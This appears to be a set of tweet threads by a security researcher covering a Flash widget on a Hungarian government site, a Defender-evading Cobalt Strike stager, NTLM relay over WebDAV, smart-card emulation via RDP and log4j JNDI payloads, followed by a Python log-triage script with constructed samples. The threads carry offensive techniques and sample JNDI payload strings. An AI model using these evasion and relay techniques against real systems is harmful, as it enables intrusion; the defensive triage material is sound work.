It is relatively easy to navigate to a customer service selector page. At the bottom there should be a county chooser according to the text, but there is nothing below. Let’s see why. 2/🧵⬇️
In the source code we can see that the webpage contains a Flash (SWF) object. Yes, the county chooser of allamkincstar.gov.hu is a Flash object, even though it is 2022 and @AdobeFlash is EOL and support has been removed from the browsers for over 1.5 years. 3/🧵⬇️
Ok, let’s download the SWF file and try to open it with the open source Ruffle.rs Flash Player emulator (outside the browser). Now we have the county chooser on a map, but unfortunately we still do not know how it interacts with the webpage. 4/🧵⬇️
Let’s add some debugging through Rust logging variables for Ruffle. Now, by clicking the various counties on the map, there are trace messages showing different error values for the different counties. For example, we get 13 for the capital Budapest + Pest county. 5/🧵⬇️
Now let’s extract the ActionScript from the SWF file using the Flare tool (nowrap.de/flare.html). The decompiled ActionScript shows that the various button release events call the same JavaScript function with different integer parameters. 6/🧵⬇️
Back to the selector page in the browser. Let’s call the extracted JS function in the console with param 13 (sniffed from tracing the SWF). Success: it opens the page where the required customer service locations are listed.
This is how we browse the web here in 2022. 7/🧵🙃🇭🇺
Built a special JS stager for Cobalt Strike (or for anything else).
Actually it is based on C# .NET, and it is super simple (full source is on the screenshot) because it uses the PE mapper from DInvoke.
Currently managed to bypass Defender.
Sharing some details in this thread.
First, I started from a stageless Cobalt Strike beacon payload generated using my custom Artifact Kit, already including some advanced evasion features that I didn't want to rewrite again.
That's why I turned to PE staging instead of the common shellcode loading technique.
Luckily, DInvoke (besides other super features) supports manual PE mapping of unmanaged code from managed .NET projects out-of-the-box.
If NetNTLMv1 is disabled but LDAP signing is not enforced on DC, and there is WebClient service enabled on the target, pwn is similar (~RBCD abuse). NTLM relay should be HTTP->LDAP instead of SMB->LDAP (WebClient does not set signature requirement on the client side).
The WebDAV target for coerced NTLM auth should be a dotless hostname (conforming to the Trusted/Intranet zone). No worries, an arbitrary hostname can be registered even using a low-privileged domain account in ADIDNS (using the dnstool script in krbrelayx).
And what if WebClient is not running (but installed) on the target? Startup is triggered when anyone opens a folder with a searchConnector-ms file containing an HTTP URL iconReference.🙂
Until then, here is how I did this before (from Linux): simulating a PIV applet on an emulated smart card device locally and passing it through RDP. 🧵/1 👇
First component needed: vpcd frankmorgner.github.io/vsmartcard/vir…, a virtual smart card device, which actually emulates a software smart card reader in the PC/SC Smart Card Daemon. Just add vpcd into pcscd. 🧵/2 👇
Next step is inserting a proper smart card into the virtual smart card reader device. Simulating PIV with PivApplet: github.com/OpenSC/OpenSC/…, a Personal Identity Verification compatible JavaCard applet using jCardSim jcardsim.org 🧵/3 👇
#log4j storm is coming, cryptominers in the first wave.
checked multiple (non-java ;) ) webservers I run and the logs are getting filled with the ${jndi:ldap://...} payloads.
THREAD: let's see a weaponized one.
one common scheme is: ldap://host:port/Basic/Command/Base64/[base64encodedstring].
some of the LDAP urls are still accessible (usually only from targeted IPs, other IPs are firewalled). getting the LDAP data returns the JNDI object.
Unfortunately this javaCodeBase URL went offline at the moment, but the Base64 encoded part is simple bash, so the "foo" class should be a basic OS command launcher.
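The triage step described in this thread (spotting ${jndi:...} lookups in web server logs and decoding the Base64 part of the ldap://host:port/Basic/Command/Base64/... scheme to see what the payload would run) can be scripted for a defender's log review. The following is an added example, not code from the thread's author; the log lines, the IP 198.51.100.7 and the encoded command are constructed samples, and the Finding class and function names are my own.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# A plain JNDI lookup as seen in the thread: ${jndi:ldap://host:port/...}
# Captures the scheme and everything up to the closing brace.
JNDI_RE = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://([^}\s]+)\}", re.IGNORECASE)

# The weaponized path layout from the thread:
#   host:port/Basic/Command/Base64/<base64 encoded shell command>
B64_CMD_RE = re.compile(r"^([^/]+)/Basic/Command/Base64/([A-Za-z0-9+/=]+)$")


@dataclass
class Finding:
    line_no: int                 # 1-based index into the scanned log
    scheme: str                  # ldap / ldaps / rmi / dns
    url: str                     # the part after "scheme://"
    host: str                    # host:port of the attacker-controlled server
    decoded_command: Optional[str]  # shell command, if the Base64 scheme matched


def decode_b64_command(url_rest: str) -> Optional[str]:
    """Return the decoded shell command for the Basic/Command/Base64 layout, else None."""
    m = B64_CMD_RE.match(url_rest)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2), validate=True).decode("utf-8", "replace")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_log(lines: List[str]) -> List[Finding]:
    """Scan raw log lines and return one Finding per JNDI lookup found."""
    findings = []
    for idx, line in enumerate(lines, start=1):
        for m in JNDI_RE.finditer(line):
            scheme, rest = m.group(1).lower(), m.group(2)
            host = rest.split("/", 1)[0]
            findings.append(Finding(idx, scheme, rest, host, decode_b64_command(rest)))
    return findings


# Constructed sample: base64 of a harmless marker command standing in for
# the "simple bash" the thread describes. "aWQ=" would decode to "id".
SAMPLE_CMD = "echo constructed-sample"
SAMPLE_B64 = base64.b64encode(SAMPLE_CMD.encode()).decode()

# Constructed Apache-style access log lines (198.51.100.7 is a documentation IP).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://198.51.100.7:1389/Basic/Command/Base64/' + SAMPLE_B64 + '}"',
    '198.51.100.7 - - [10/Dec/2021:03:14:11 +0000] "GET /?x=${jndi:ldap://198.51.100.7:1389/o} HTTP/1.1" 404 196 "-" "curl/7.68.0"',
]


def summarize(lines: List[str]) -> dict:
    """Count lookups per attacker host, which is what you would feed a blocklist review."""
    counts = {}
    for f in scan_log(lines):
        counts[f.host] = counts.get(f.host, 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.scheme}://{f.url}")
        if f.decoded_command is not None:
            print(f"  decoded command: {f.decoded_command!r}")
    print("lookups per host:", summarize(SAMPLE_LOG))
```

The regex only catches the plain `${jndi:...}` form; the thread shows that form, and a quick scan like this is for triage (which hosts to block, what the payload would have run), not a substitute for patching log4j.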